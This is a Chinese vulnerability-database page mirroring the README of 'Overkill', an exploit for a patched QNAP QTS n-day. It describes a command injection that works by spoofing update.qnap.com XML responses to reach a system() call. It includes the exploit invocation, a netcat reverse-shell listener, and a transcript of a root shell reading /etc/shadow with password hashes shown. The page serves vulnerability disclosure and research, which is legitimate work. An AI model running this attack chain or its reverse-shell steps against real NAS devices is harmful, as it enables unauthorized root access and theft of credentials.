关联漏洞
标题:Qnap Systems QNAP QTS和QNAP Systems QUTS Hero 命令注入漏洞 (CVE-2020-2509)Description:Qnap Systems QNAP QTS是中国Qnap Systems公司的一款类似SAN存储架构的数据存储设备。该设备支持分层存储、镜像保护等保障功能。QNAP Systems QUTS Hero是中国QNAP Systems公司的一款用于管理文件的NAS操作系统。该系统保留了QTS的应用生态,整合更强大的128位ZFS文件系统,为企业提供更稳定可靠的NAS存储解决方案。 QTS and QuTS hero 存在命令注入漏洞,该漏洞源于攻击者可利用该漏洞就可以在一个被破坏的应用程序中执行任意命令。
Description
QNAP N-Day (Probably not CVE-2020-2509)
介绍
# Overkill
Overkill is an exploit for a patched vulnerability affecting QNAP QTS. Due to the way QNAP discloses vulnerabilities, I'm unsure if this issue has a CVE or not. However, it was likely patched in November 2020 and April 2021. The n-day was "discovered" while doing diff analysis for CVE-2020-2509. This is almost certainly not CVE-2020-2509.
The exploit will send HTTP GET requests to `/cgi-bin/qnapmsg.cgi?lang=xxx` which will cause unpatched QNAP devices to download an XML file from `update.qnap.com` via insecure HTTP. An attacker that can redirect `update.qnap.com` to themselves can respond with an attacker controlled XML file. When the QNAP parses the XML file it will pass some of the contents to a `system` call, resulting in a reverse shell.
This exploit *does not* implement the method to get `update.qnap.com` requests directed to the exploit. In the example below, I was using router DNS hijacking on my own router... your mileage may vary.
## Usage Example
```
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252
01001001001000000110001101100001011011100010011101110100001000000110011101100101
______ ___ ___ _______ _______ __ ___ __ ___ ___
/ " \|" \ /" |/" "| /" \ |/"| / ") |" \ |" | |" |
// ____ \\ \ // /(: ______)|: |(: |/ / || | || | || |
/ / ) :)\\ \/. ./ \/ | |_____/ )| __/ |: | |: | |: |
(: (____/ // \. // // ___)_ // / (// _ \ |. | \ |___ \ |___
\ / \\ / (: "||: __ \ |: | \ \ /\ |\( \_|: \( \_|: \
\"_____/ \__/ \_______)|__| \___)(__| \__)(__\_|_)\_______)\_______)
01110100001000000111010001101111001000000111001101101100011001010110010101110000
🦞 jbaines-r7
[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:!:19181:0:99999:7:::
bash-3.2# exit
```
## Credit
* [Overkill](https://www.youtube.com/watch?v=vB_IynOTQU0) by Lazlo Bane featuring Colin Hay
文件快照
[4.0K] /data/pocs/fc70c1e3a2e947bf13e9d8c2cb8134af2e2495a3
├── [1.5K] LICENSE
├── [4.8K] overkill.py
└── [2.8K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。